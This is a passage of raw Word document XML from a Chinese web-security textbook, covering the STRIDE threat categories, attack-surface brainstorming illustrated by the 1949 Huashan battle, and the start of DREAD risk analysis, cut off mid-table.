              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="39"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>机密信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="39"/>
              <w:ind w:left="116"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>机密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Denial of Service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>（拒绝服务）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>拒绝服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="116"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>可用性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3890" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Elevation of Privilege</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>（提升权限）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2224" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>未经授权获得许可</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1991" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="116"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>授权</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="164"/>
        <w:ind w:left="623"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在进行威胁分析时，要尽可能地不遗漏威胁，头脑风暴的过程可以确定攻击面（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>在维护系统安全时，最让安全工程师沮丧的事情就是花费很多的时间与精力实施安全方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>案，但是攻击者却利用了事先完全没有想到的漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>漏洞的定义：系统中可能被威胁利用以造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>成危害的地方。</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）完成入侵。这往往就是由于在确定攻击面时，想的不够全面而导致的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="122" w:firstLine="391"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>以前有部老电影叫做《智取华山》，是根据真实事件改编的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1949</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-32"/>
        </w:rPr>
        <w:t>年 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>月中旬，打响了“陕</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>中战役”，国民党保安第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>旅旅长兼第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>区专员韩子佩率残部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>余人逃上华山，企图凭借“自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>古华山一条道”的天险负隅顽抗。路东总队决定派参谋刘吉尧带侦察小分队前往侦察，刘吉尧率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>领小分队，在当地村民的带领下，找到了第二条路：爬悬崖！克服种种困难，最终顺利地完成了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>任务。战后，刘吉尧光荣地出席了全国英模代表大会，并被授予“全国特等战斗英雄”荣誉称号。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>我们用安全眼光来看这次战斗。国民党部队在进行“威胁分析”时，只考虑到“自古华山</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>一条道”，所以在正路上布重兵，而完全忽略了其他的可能。他们“相信”其他道路是不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>的，这是他们实施安全方案的基础，而一旦这个信任基础不存在了，所有的安全方案都将化作浮云，从而被共产党的部队击败。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>所以威胁分析是非常重要的一件事情，很多时候还需要经常回顾和更新现有的模型。可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>存在很多威胁，但并非每个威胁都会造成难以承受的损失。一个威胁到底能够造成多大的危害， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>如何去衡量它？这就要考虑到风险了。我们判断风险高低的过程，就是风险分析的过程。在“风险分析”这个阶段，也有模型可以帮助我们进行科学的思考。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250007" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>风险由以下因素组成：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Risk = Probability * Damage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>Potentia</w:t>
      </w:r>
      <w:bookmarkStart w:name="1.6.3  风险分析" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="419"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>影响风险高低的因素，除了造成损失的大小外，还需要考虑到发生的可能性。地震的危害</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>很大，但是地震、火山活动一般是在大陆板块边缘频繁出现，比如日本、印尼就处于这些地理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>位置，因此地震频发；而在大陆板块中心，若是地质结构以整块的岩石为主，则不太容易发生地震，因此地震的风险就要小很多。我们在考虑安全问题时，要结合具体情况，权衡事件发生的可能性，才能正确地判断出风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="225" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>如何更科学地衡量风险呢？这里再介绍一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DREAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>模型，它也是由微软提出的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DREAD </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>也是几个单词的首字母缩写，它指导我们应该从哪些方面去判断一个威胁的风险程度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="2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157"/>
        <w:gridCol w:w="2580"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="1850"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="280" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1157" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:pos="729" w:val="left" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="39"/>
              <w:ind w:left="278"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>等</w:t>
              <w:tab/>
              <w:t>级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="39"/>
              <w:ind w:left="1108" w:right="1087"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>(3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="39"/>
              <w:ind w:left="1077" w:right="1059"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="39"/>
              <w:ind w:left="743" w:right="717"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="561" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1157" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="47"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Damage</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="108"/>
              <w:ind w:left="107"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Potential</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2580" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>获取完全验证权限；执行管理员操</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="88"/>
              <w:ind w:left="112"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>作；非法上传文件</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before="11"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1"/>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>泄露敏感信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="11"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
